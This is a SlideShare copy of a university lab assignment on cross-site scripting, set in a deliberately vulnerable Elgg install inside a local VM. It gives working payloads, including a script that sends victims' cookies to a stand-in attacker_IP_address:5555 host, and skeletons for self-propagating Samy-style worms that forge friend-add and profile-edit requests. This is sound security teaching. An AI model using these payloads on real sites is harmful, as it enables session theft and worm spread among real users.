SlideShare a Scribd company logo

Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx

Download as DOCX, PDF
M
mydrynan

Cross-site scripting (XSS) is a web application vulnerability allowing attackers to inject malicious code into users' browsers, potentially stealing credentials. The document outlines a project for students to exploit XSS vulnerabilities in a modified Elgg application, initiating similar attacks to those seen in the Samy worm incident on MySpace. Various tasks guide students through exploiting the vulnerability by executing scripts that retrieve cookies, modify friend lists, and alter user profiles.

Education
1 of 15
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser. Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks. To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application named Elgg in our pre-built Ubuntu VM image. Elgg is an open-source web application for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation, intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post any arbitrary message, including JavaScript programs, to the user profiles. In this lab, students need to exploit this vulnerability to launch an XSS attack on the modified Elgg, in a way that is similar to what Samy Kamkar did to MySpace in 2005 through the notorious Samy worm. The ultimate goal of this attack is to spread an XSS worm among the users, such that whoever views an infected user profile will be infected, and whoever is infected will add you (i.e., the attacker) to his/her friend list. Environment setup for the problem: For this problem, we will assume that you have set up the Ubuntu virtual machine environment based on the instructions
in the Syllabus under “Special Software Installation Requirements”. We will need the following: · Firefox web browser · Apache web server · Elgg web application For the Firefox browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses (available under the “Tools” menu in Firefox). The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extension. The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands: % sudo apache2ctl start or % sudo service apache2 start The Elgg web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts on the Elgg server and the credentials are given below (username, password): admin, seedelgg alice, seedalice boby, seedboby charlie, seedcharlie samy, seedsamy You can access the Elgg server using the following URL (the Apache server needs to be started first): http://www.xsslabelgg.com
(this URL is only accessible from inside of the virtual machine, because we have modified the /etc/hostsfile to map the domain name (www.xsslabelgg.com) to the virtual machine’s local IP address 127.0.0.1). Once you log in as a user in Elgg, you can access your Profile and list of Friends by clicking on icons in the upper left part of the browser window. Note: Some of the project tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help you get started. i. Posting a Malicious Message to Display an Alert Window The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the JavaScript program will be executed and an alert window will be displayed. The following JavaScript program will display an alert window: <script>alert('XSS');</script> If you embed the above JavaScript code in your Profile (e.g. in the brief description field), then any user who views your profile will see the alert window. What you need to do: 1. Login as user Alice and change the "Brief description" field in your Profile such that an alert window which has the following text will open: XSS attack by <insert your real name/s here> 2. Logout and login as user Boby, and then select user Alice from "More => Members" in the Elgg menu. 3. Include in your project document a screen printout with this
alert window. ii. Posting a Malicious Message to Display Cookies The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the user’s cookies will be displayed in the alert window. This can be done by adding some additional code to the JavaScript program in the previous task: <script>alert(document.cookie);</script> Hello Everybody, Welcome to this message board. When a user views this message post, he/she will see a pop-up message box that displays the cookies of the user. What you need to do: 1. Login as user Alice and change the "Brief description" field in your Profile such that an alert window which contains the user’s cookies will open. 2. Logout and login as user Charlie, and then select user Alice from "More => Members" in the Elgg menu. 3. Include in your project document a screen printout with this alert window. iii. Stealing Cookies from the Victim’s Machine In the previous task, the malicious JavaScript code can print out the user’s cookies; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the attacker, with the cookies appended to the
request. We can do this by having the malicious JavaScript code insert an <img> tag with its src attribute set to a URL on the attacker’s website. When the JavaScript inserts the <img> tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attacker's website. The JavaScript given below sends the cookies to port 5555 of the attacker’s machine, where the attacker has a TCP server listening to the same port. The server can print out whatever it receives. The TCP server program is available on the course website. Hello Folks, <script>document.write('<img src=http://attacker_IP_address:5555?c=' + escape(document.cookie) + ' >'); </script> This script tests an XSS attack. What you need to do: 1. Download, un-compress (it’s a TAR archive, use 'tar xvf' to un-compress) and compile the TCP server program (compile using the command make). The server can be found as file echoserv.tar under the Moodle forums post for Project 2. Run this server on port 5555. 2. Login as user Samy and change the "About me" field in your Profile such that the cookies of whoever is viewing Samy's profile will be sent to the attacker’s TCP server (you need to replace 'attacker_IP_address' in the script above with the appropriate value). When editing the "About me" field, select the "Remove editor" option to avoid automatic re-formatting of your text. 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg
menu. 4. Include in your project document: a. a screen printout with the text printed by the TCP server. b. the JavaScript script you used in step 2 above. vi. Writing an XSS Worm In this and next task, we will perform an attack similar to what Samy did to MySpace in 2005 (i.e., the Samy Worm). First, we will write an XSS worm that does not self- propagate; in the next task, we will make it self-propagating. From the previous task, we have learned how to steal the cookies from the victim. In this task, we need to write a malicious JavaScript to forge a HTTP request directly from the victim’s browser. This attack does not require the intervention from the attacker. The JavaScript that can achieve this is called a cross-site scripting worm. This task consists of two independent sub-tasks. Subtask: XSS Worm that adds a friend The objective of the attack in this subtask is to modify the victim’s profile and add Samy as a friend of the victim. To add a friend for the victim, we should first find out how a legitimate user adds a friend in Elgg. More specifically, we need to figure out what is sent to the server when a user adds a friend. Firefox’s LiveHTTPHeaders extension can help us (available under the "Tools" menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the parameters in the request.
There are two common types of HTTP requests, one is HTTP GET request, and the other is HTTP POST request. These two types of HTTP requests differ in how they send the contents of the request to the server. We can use the JavaScript XMLHttpRequest object to send HTTP GET and POST requests to web applications. XMLHttpRequest can only send HTTP requests back to the server, instead of other computers, because the same-origin policy is strongly enforced for XMLHttpRequest. This is not an issue for us, because we do want to use XMLHttpRequest to send a forged HTTP request back to the Elgg server. To learn how to use XMLHttpRequest, you can study these documents: https://www.w3schools.com/xml/ajax_xmlhttprequest_create.as p https://www.w3schools.com/xml/xml_http.asp https://developer.mozilla.org/en-US/docs/AJAX/Getting_Started https://www.tutorialspoint.com/ajax/what_is_xmlhttprequest.ht m If you are not familiar with JavaScript programming, we suggest that you study the following documents to learn some basic JavaScript functions. You will have to use some of these functions. Essential Javascript – A Javascript Tutorial: https://www.evl.uic.edu/luc/bvis546/Essential_Javascript_-- _A_Javascript_Tutorial.pdf You may also need to debug your JavaScript code. Firebug is a Firefox extension that helps you debug JavaScript code. It can point you to the precise places that contain errors. FireBug is already installed in Firefox in our pre-built Ubuntu VM image (available under the "Tools" menu in Firefox). For this subtask, the worm program should do the following:
1. Create the correct request to add Samy to the friends list of the user who is executing the malicious code 2. Forge a HTTP GET request to add Samy as a friend. Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy's profile, and any user that views Samy's profile will then automatically add Samy as their friend. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy's profile, you need to remove all the comments, extra space, and new-line characters. <script id="worm" type="text/javascript"> var Ajax=null; //Construct the HTTP request to add Samy as a friend. var sendurl="…"; //Create and send Ajax request to add friend. // The format of the request can be learned from LiveHttpHeaders. Ajax=new XMLHttpRequest(); Ajax.open("GET",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com"); Ajax.setRequestHeader("Keep-Alive","300"); Ajax.setRequestHeader("Connection","keep-alive"); // (JavaScript code to access session cookie) Ajax.setRequestHeader("Cookie",document.cookie); Ajax.setRequestHeader("Content-Type","application/x-www- form-urlencoded"); Ajax.send(); </script>
Note that in this case the GET method is used to send the HTTP request. To modify the victim's profile, the HTTP request sent by the worm should contain the victim's __elgg_ts and __elgg_token values in the sendurl variable. These details are present in the web page (right-click and "View Page Source") and the worm needs to find out and use this information using JavaScript code. The sendurl variable should also contain Samy's id. What you need to do: 1. Based on the format of the GET request to add a friend, write a JavaScript script that adds Samy to the friends list of any user who views Samy's profile. Save your JavaScript script in a file task4-1.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task4-1.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Samy will be added to Alice's friend list. 4. Include in your project document: a. a screen printout with Alice's friends list after viewing Samy's profile. b. a printout of your JavaScript file task4-1.txt. 5. Include the file task4-1.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course. Subtask XSS Worm that changes the victim's profile The objective of the attack in this subtask is to modify the victim’s profile "About me" field to show the text "Samy is my HERO". To do this, we should first find out how a legitimate profile change looks like in Elgg. More specifically, we need to figure out what is sent to the server when a user changes the
"About me" field and saves her profile. Firefox’s LiveHTTPHeaders extension can help us (available under the "Tools" menu in Firefox); it can display the header and contents of any HTTP request message sent from the browser. From this, we can identify all the needed data in the request. For this subtask, the worm program should do the following: 1. Create the correct request to add a certain piece of text into the profile of a user (the victim) who is viewing Samy's profile 2. Forge a HTTP POST request to change the profile of the victim user. Code Skeleton. We provide a skeleton of the JavaScript code that you need to write. This JavaScript code is inserted into user Samy's profile, and any user that views Samy's profile will then automatically have their "About me" profile field changed to a certain piece of text. You need to fill in all the necessary details. When you include the final JavaScript code in the message posted to Samy's profile, you need to remove all the comments, extra space, and new-line characters. <script id="worm" type="text/javascript"> var Ajax=null; //Construct the HTTP POST request to modify profile. var sendurl="… "; var content= "…"; //Modify Victim's profile except for SAMY if(…) { //Create and send Ajax request to modify profile Ajax=null; Ajax=new XMLHttpRequest(); Ajax.open("POST",sendurl,true); Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Keep-Alive","300"); Ajax.setRequestHeader("Connection","keep-alive"); // JavaScript code to access session cookie Ajax.setRequestHeader("Cookie",document.cookie); Ajax.setRequestHeader("Content-Type","application/x- www-form-urlencoded"); Ajax.send(content); } </script> Note that in this case the POST method is used to send the HTTP request. To modify the victim's profile, the HTTP request sent by the worm should contain certain information about the victim in the HTML body of the request (which is sent via the content variable): · The __elgg_ts and __elgg_token values are present in the web page (right-click and "View Page Source") and the worm needs to find out and use this information using JavaScript code. · The victim's user name can be obtained using elgg.session.user.name · The victim's id (guid) can be obtained using elgg.session.user.guid Important note: Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile. What you need to do: 1. Based on the format of the POST request to change a user's profile, write a JavaScript script that changes the "About me" field in the profile of any user (the victim) who views Samy's profile. The "About me" field should contain the following text:
Samy is my HERO (added by <insert your team member name/s here> Save your JavaScript script in a file task4-2.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task4-2.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice's profile will be changed. 4. Include in your project document: a. a screen printout with Alice's profile after viewing Samy's profile. b. a printout of your JavaScript file task4-2.txt. 5. Include the file task4-2.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course. v. Writing a Self-Propagating XSS Worm To become a real worm, the malicious JavaScript program should be able to propagate itself. Namely, whenever some people view an infected profile, not only will their profiles be modified, the worm will also be propagated to their profiles, further affecting others who view these newly infected profiles. This way, the more people view the infected profiles, the faster the worm can propagate. This is exactly the same mechanism used by the Samy Worm: within just 20 hours of its October 4, 2005 release, over one million users were affected, making Samy one of the fastest spreading viruses of all time. The JavaScript code that can achieve this is called a self- propagating cross-site scripting worm. In this task, you need to implement such a worm, which infects the victim’s profile. To achieve self-propagation, when the malicious JavaScript modifies the victim’s profile, it should copy itself to the victim’s profile. If the entire JavaScript program (i.e., the
worm) is embedded in the infected profile, to propagate the worm to another profile, the worm code can use DOM APIs to retrieve a copy of itself from the web page. An example of using DOM APIs is given below. This code gets a copy of itself, and display it in an alert window: <script id=worm> var strCode = document.getElementById("worm"); alert(strCode.innerHTML); </script> URL Encoding: All messages transmitted using HTTP over the Internet use URL Encoding, which converts all non-ASCII characters such as space to special code under the URL encoding scheme. In the worm code, messages sent to Elgg should be encoded using URL encoding. The escape function can be used to URL encode a string. An example of using the encode function is given below. <script> var strSample = "Hello World"; var urlEncSample = escape(strSample); alert(urlEncSample); </script> Under the URL encoding scheme, the “+” symbol is used to denote space. In JavaScript programs, “+” is used for both arithmetic operations and string concatenation operations. To avoid this ambiguity, you may use the concat function for string concatenation, and avoid using addition. For the worm code in the exercise, you don’t have to use additions. If you do have to add a number (e.g a+5), you can use subtraction (e.g a-(-5)). Other notes: · To modify the victim's profile, the HTTP request sent by the worm should contain the following information in the HTML body of the request (which is sent via the content variable):
&accesslevel%5Bdescription%5D=2 (in fact, using the LiveHTTPHeaders extension, you can see this is included in a regular edit profile request) · Be careful when dealing with an infected profile. If a profile is already infected by the XSS worm, you may want to leave them alone, instead of modifying them again. If you are not careful, you may end up removing the XSS worm from the profile. What you need to do: 1. Based on the format of the POST request to change a user's profile, write a JavaScript script that changes the "About me" field in the profile of any user (the victim) who views an infected profile. The "About me" field should contain the following text: Samy is my HERO (added by <insert your team member name/s here>) Save your JavaScript script in a file task5.txt. 2. Login as user Samy and inject in the "About me" field of Samy's profile the script from file task5.txt. (Make sure to select "Remove editor" before editing this field, in order to disable any automatic formatting) 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Alice's profile will be infected as well. 4. Logout and login as user Boby, and then view Alice's profile by selecting user Alice from "More => Members" in the Elgg menu. At this point, the malicious Javascript script will be executed and Boby's profile will be infected as well. 5. Include in your project document: a. a screen printout with Alice's profile after viewing Samy's profile. b. a screen printout with Boby's profile after viewing Alice's profile. c. A printout of your JavaScript file task5.txt.
6. Include the file task5.txt in a ZIP archive and upload this ZIP archive onto the Moodle website for the course.

More Related Content

DOCX
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
mydrynan
 
PDF
XSS
tutorialsruby
 
PDF
XSS
tutorialsruby
 
PPT
Xssandcsrf
Prabhanshu Saraswat
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
PDF
Cross Site Attacks
UTD Computer Security Group
 
PPTX
Convincing Developers to take Cross-Site Scripting Seriously
jpubal
 
KEY
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 
Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) .docx
mydrynan
 
XSS
tutorialsruby
 
XSS
tutorialsruby
 
Xssandcsrf
Prabhanshu Saraswat
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Cross Site Attacks
UTD Computer Security Group
 
Convincing Developers to take Cross-Site Scripting Seriously
jpubal
 
Cross Site Scripting - Mozilla Security Learning Center
Michael Coates
 

Similar to Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx (20)

PDF
The Cross Site Scripting Guide
Daisuke_Dan
 
PPTX
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
PPTX
04. xss and encoding
Eoin Keary
 
PDF
Secure Form Processing and Protection - Sunshine PHP 2015
Joe Ferguson
 
PDF
Complete xss walkthrough
Ahmed Elhady Mohamed
 
PPTX
Cross-Site Scripting (XSS)
Daniel Tumser
 
PPT
Web Aplication Vulnerabilities
Jbyte
 
PPT
Seguridad Web by Jordan Diaz
Jordan Diaz
 
PPTX
Web Hacking Series Part 4
Aditya Kamat
 
PDF
Session7-XSS & CSRF
zakieh alizadeh
 
PDF
xss-100908063522-phpapp02.pdf
yashvirsingh48
 
PDF
XSS.pdf
Okan YILDIZ
 
PDF
XSS.pdf
Okan YILDIZ
 
PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
PPTX
Post XSS Exploitation : Advanced Attacks and Remedies
Adwiteeya Agrawal
 
PDF
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
PDF
Ch 12 Attacking Users - XSS
Sam Bowne
 
PDF
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 
PDF
Insecurities 2.0
Martin Johns
 
PDF
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET Journal
 
The Cross Site Scripting Guide
Daisuke_Dan
 
Website hacking and prevention (All Tools,Topics & Technique )
Jay Nagar
 
04. xss and encoding
Eoin Keary
 
Secure Form Processing and Protection - Sunshine PHP 2015
Joe Ferguson
 
Complete xss walkthrough
Ahmed Elhady Mohamed
 
Cross-Site Scripting (XSS)
Daniel Tumser
 
Web Aplication Vulnerabilities
Jbyte
 
Seguridad Web by Jordan Diaz
Jordan Diaz
 
Web Hacking Series Part 4
Aditya Kamat
 
Session7-XSS & CSRF
zakieh alizadeh
 
xss-100908063522-phpapp02.pdf
yashvirsingh48
 
XSS.pdf
Okan YILDIZ
 
XSS.pdf
Okan YILDIZ
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Post XSS Exploitation : Advanced Attacks and Remedies
Adwiteeya Agrawal
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
Sam Bowne
 
Ch 12 Attacking Users - XSS
Sam Bowne
 
Security Vulnerabilities: How to Defend Against Them
Martin Vigo
 
Insecurities 2.0
Martin Johns
 
IRJET- A Survey on Various Cross-Site Scripting Attacks and Few Prevention Ap...
IRJET Journal
 
Ad

More from mydrynan (20)

DOCX
CSIA 413 Cybersecurity Policy, Plans, and Programs.docx
mydrynan
 
DOCX
CSIS 100CSIS 100 - Discussion Board Topic #1One of the object.docx
mydrynan
 
DOCX
CSI Paper Grading Rubric- (worth a possible 100 points) .docx
mydrynan
 
DOCX
CSIA 413 Cybersecurity Policy, Plans, and ProgramsProject #4 IT .docx
mydrynan
 
DOCX
CSI 170 Week 3 AssingmentAssignment 1 Cyber Computer CrimeAss.docx
mydrynan
 
DOCX
CSE422 Section 002 – Computer Networking Fall 2018 Ho.docx
mydrynan
 
DOCX
CSCI  132  Practical  Unix  and  Programming   .docx
mydrynan
 
DOCX
CSCI 714 Software Project Planning and EstimationLec.docx
mydrynan
 
DOCX
CSCI 561Research Paper Topic Proposal and Outline Instructions.docx
mydrynan
 
DOCX
CSCI 561 DB Standardized Rubric50 PointsCriteriaLevels of .docx
mydrynan
 
DOCX
CryptographyLesson 10© Copyright 2012-2013 (ISC)², Inc. Al.docx
mydrynan
 
DOCX
CSCI 352 - Digital Forensics Assignment #1 Spring 2020 .docx
mydrynan
 
DOCX
CSCE 1040 Homework 2 For this assignment we are going to .docx
mydrynan
 
DOCX
CSCE509–Spring2019Assignment3updated01May19DU.docx
mydrynan
 
DOCX
CSCI 2033 Elementary Computational Linear Algebra(Spring 20.docx
mydrynan
 
DOCX
CSCE 3110 Data Structures & Algorithms Summer 2019 1 of .docx
mydrynan
 
DOCX
CSCI 340 Final Group ProjectNatalie Warden, Arturo Gonzalez, R.docx
mydrynan
 
DOCX
CSC-321 Final Writing Assignment In this assignment, you .docx
mydrynan
 
DOCX
Cryptography is the application of algorithms to ensure the confiden.docx
mydrynan
 
DOCX
CSc3320 Assignment 6 Due on 24th April, 2013 Socket programming .docx
mydrynan
 
CSIA 413 Cybersecurity Policy, Plans, and Programs.docx
mydrynan
 
CSIS 100CSIS 100 - Discussion Board Topic #1One of the object.docx
mydrynan
 
CSI Paper Grading Rubric- (worth a possible 100 points) .docx
mydrynan
 
CSIA 413 Cybersecurity Policy, Plans, and ProgramsProject #4 IT .docx
mydrynan
 
CSI 170 Week 3 AssingmentAssignment 1 Cyber Computer CrimeAss.docx
mydrynan
 
CSE422 Section 002 – Computer Networking Fall 2018 Ho.docx
mydrynan
 
CSCI  132  Practical  Unix  and  Programming   .docx
mydrynan
 
CSCI 714 Software Project Planning and EstimationLec.docx
mydrynan
 
CSCI 561Research Paper Topic Proposal and Outline Instructions.docx
mydrynan
 
CSCI 561 DB Standardized Rubric50 PointsCriteriaLevels of .docx
mydrynan
 
CryptographyLesson 10© Copyright 2012-2013 (ISC)², Inc. Al.docx
mydrynan
 
CSCI 352 - Digital Forensics Assignment #1 Spring 2020 .docx
mydrynan
 
CSCE 1040 Homework 2 For this assignment we are going to .docx
mydrynan
 
CSCE509–Spring2019Assignment3updated01May19DU.docx
mydrynan
 
CSCI 2033 Elementary Computational Linear Algebra(Spring 20.docx
mydrynan
 
CSCE 3110 Data Structures & Algorithms Summer 2019 1 of .docx
mydrynan
 
CSCI 340 Final Group ProjectNatalie Warden, Arturo Gonzalez, R.docx
mydrynan
 
CSC-321 Final Writing Assignment In this assignment, you .docx
mydrynan
 
Cryptography is the application of algorithms to ensure the confiden.docx
mydrynan
 
CSc3320 Assignment 6 Due on 24th April, 2013 Socket programming .docx
mydrynan
 
Ad

Recently uploaded (20)

PDF
Classroom Observation Tools for Teachers
Nicaramirez
 
PDF
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
PDF
GENETICS IN BIOLOGY IN SECONDARY LEVEL FORM 3
ElishamichaelSamwel
 
PPTX
202450812 BayCHI UCSC-SV 20250812 v17.pptx
home
 
PPTX
GDM (1) (1).pptx small presentation for students
shrawanbpkihs
 
PDF
Chinmaya Tiranga quiz Grand Finale.pdf
Nitin Suresh
 
PDF
O5-L3 Freight Transport Ops (International) V1.pdf
labyankof
 
PPTX
human mycosis Human fungal infections are called human mycosis..pptx
shilpa939953
 
PDF
VCE English Exam - Section C Student Revision Booklet
jpinnuck
 
PPTX
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
PPTX
school management -TNTEU- B.Ed., Semester II Unit 1.pptx
NihumathunnisaH
 
PDF
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 
PPTX
Introduction-to-Literarature-and-Literary-Studies-week-Prelim-coverage.pptx
EricaRamos80
 
PDF
Supply Chain Operations Speaking Notes -ICLT Program
labyankof
 
PDF
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
PDF
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
banteamlakmebratu738
 
PPTX
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
PDF
102 student loan defaulters named and shamed – Is someone you know on the list?
Kweku Zurek
 
PPTX
Pharma ospi slides which help in ospi learning
rameetkumar304
 
PPTX
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 
Classroom Observation Tools for Teachers
Nicaramirez
 
STATICS OF THE RIGID BODIES Hibbelers.pdf
pascualasturiaskaye4
 
GENETICS IN BIOLOGY IN SECONDARY LEVEL FORM 3
ElishamichaelSamwel
 
202450812 BayCHI UCSC-SV 20250812 v17.pptx
home
 
GDM (1) (1).pptx small presentation for students
shrawanbpkihs
 
Chinmaya Tiranga quiz Grand Finale.pdf
Nitin Suresh
 
O5-L3 Freight Transport Ops (International) V1.pdf
labyankof
 
human mycosis Human fungal infections are called human mycosis..pptx
shilpa939953
 
VCE English Exam - Section C Student Revision Booklet
jpinnuck
 
Microbial diseases, their pathogenesis and prophylaxis
DevlinaSengupta
 
school management -TNTEU- B.Ed., Semester II Unit 1.pptx
NihumathunnisaH
 
01-Introduction-to-Information-Management.pdf
PrinceIbarra
 
Introduction-to-Literarature-and-Literary-Studies-week-Prelim-coverage.pptx
EricaRamos80
 
Supply Chain Operations Speaking Notes -ICLT Program
labyankof
 
Microbial disease of the cardiovascular and lymphatic systems
KeyaSharma
 
grade 11-chemistry_fetena_net_5883.pdf teacher guide for all student
banteamlakmebratu738
 
Cell Types and Its function , kingdom of life
ClaireMangundayao1
 
102 student loan defaulters named and shamed – Is someone you know on the list?
Kweku Zurek
 
Pharma ospi slides which help in ospi learning
rameetkumar304
 
IMMUNITY IMMUNITY refers to protection against infection, and the immune syst...
shilpa939953
 

Cross-site scripting (XSS) AttacksCross-site scripting (XSS) i.docx

  • 1. Cross-site scripting (XSS) Attacks Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. This vulnerability makes it possible for attackers to inject malicious code (e.g. JavaScript programs) into victim’s web browser. Using this malicious code, the attackers can steal the victim’s credentials, such as cookies. The access control policies (i.e., the same origin policy) employed by the browser to protect those credentials can be bypassed by exploiting the XSS vulnerability. Vulnerabilities of this kind can potentially lead to large-scale attacks. To demonstrate what attackers can do by exploiting XSS vulnerabilities, we have set up a web application named Elgg in our pre-built Ubuntu VM image. Elgg is an open-source web application for social networking, and it has implemented a number of countermeasures to remedy the XSS threat. To demonstrate how XSS attacks work, we have commented out these countermeasures in Elgg in our installation, intentionally making Elgg vulnerable to XSS attacks. Without the countermeasures, users can post any arbitrary message, including JavaScript programs, to the user profiles. In this lab, students need to exploit this vulnerability to launch an XSS attack on the modified Elgg, in a way that is similar to what Samy Kamkar did to MySpace in 2005 through the notorious Samy worm. The ultimate goal of this attack is to spread an XSS worm among the users, such that whoever views an infected user profile will be infected, and whoever is infected will add you (i.e., the attacker) to his/her friend list. Environment setup for the problem: For this problem, we will assume that you have set up the Ubuntu virtual machine environment based on the instructions
  • 2. in the Syllabus under “Special Software Installation Requirements”. We will need the following: · Firefox web browser · Apache web server · Elgg web application For the Firefox browser, we need to use the LiveHTTPHeaders extension for Firefox to inspect the HTTP requests and responses (available under the “Tools” menu in Firefox). The pre-built Ubuntu VM image provided to you has already installed the Firefox web browser with the required extension. The Apache web server is also included in the pre-built Ubuntu image. However, the web server is not started by default. You have to first start the web server using one of the following two commands: % sudo apache2ctl start or % sudo service apache2 start The Elgg web application is already set up in the pre-built Ubuntu VM image. We have also created several user accounts on the Elgg server and the credentials are given below (username, password): admin, seedelgg alice, seedalice boby, seedboby charlie, seedcharlie samy, seedsamy You can access the Elgg server using the following URL (the Apache server needs to be started first): http://www.xsslabelgg.com
  • 3. (this URL is only accessible from inside of the virtual machine, because we have modified the /etc/hostsfile to map the domain name (www.xsslabelgg.com) to the virtual machine’s local IP address 127.0.0.1). Once you log in as a user in Elgg, you can access your Profile and list of Friends by clicking on icons in the upper left part of the browser window. Note: Some of the project tasks require some basic familiarity with JavaScript. Wherever necessary, we provide a sample JavaScript program to help you get started. i. Posting a Malicious Message to Display an Alert Window The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the JavaScript program will be executed and an alert window will be displayed. The following JavaScript program will display an alert window: <script>alert('XSS');</script> If you embed the above JavaScript code in your Profile (e.g. in the brief description field), then any user who views your profile will see the alert window. What you need to do: 1. Login as user Alice and change the "Brief description" field in your Profile such that an alert window which has the following text will open: XSS attack by <insert your real name/s here> 2. Logout and login as user Boby, and then select user Alice from "More => Members" in the Elgg menu. 3. Include in your project document a screen printout with this
  • 4. alert window. ii. Posting a Malicious Message to Display Cookies The objective of this task is to embed a JavaScript program in your Elgg profile, such that when another user views your profile, the user’s cookies will be displayed in the alert window. This can be done by adding some additional code to the JavaScript program in the previous task: <script>alert(document.cookie);</script> Hello Everybody, Welcome to this message board. When a user views this message post, he/she will see a pop-up message box that displays the cookies of the user. What you need to do: 1. Login as user Alice and change the "Brief description" field in your Profile such that an alert window which contains the user’s cookies will open. 2. Logout and login as user Charlie, and then select user Alice from "More => Members" in the Elgg menu. 3. Include in your project document a screen printout with this alert window. iii. Stealing Cookies from the Victim’s Machine In the previous task, the malicious JavaScript code can print out the user’s cookies; in this task, the attacker wants the JavaScript code to send the cookies to himself/herself. To achieve this, the malicious JavaScript code needs to send an HTTP request to the attacker, with the cookies appended to the
  • 5. request. We can do this by having the malicious JavaScript code insert an <img> tag with its src attribute set to a URL on the attacker’s website. When the JavaScript inserts the <img> tag, the browser tries to load the image from the mentioned URL and in the process ends up sending a HTTP GET request to the attacker's website. The JavaScript given below sends the cookies to port 5555 of the attacker’s machine, where the attacker has a TCP server listening to the same port. The server can print out whatever it receives. The TCP server program is available on the course website. Hello Folks, <script>document.write('<img src=http://attacker_IP_address:5555?c=' + escape(document.cookie) + ' >'); </script> This script tests an XSS attack. What you need to do: 1. Download, un-compress (it’s a TAR archive, use 'tar xvf' to un-compress) and compile the TCP server program (compile using the command make). The server can be found as file echoserv.tar under the Moodle forums post for Project 2. Run this server on port 5555. 2. Login as user Samy and change the "About me" field in your Profile such that the cookies of whoever is viewing Samy's profile will be sent to the attacker’s TCP server (you need to replace 'attacker_IP_address' in the script above with the appropriate value). When editing the "About me" field, select the "Remove editor" option to avoid automatic re-formatting of your text. 3. Logout and login as user Alice, and then view Samy's profile by selecting user Samy from "More => Members" in the Elgg
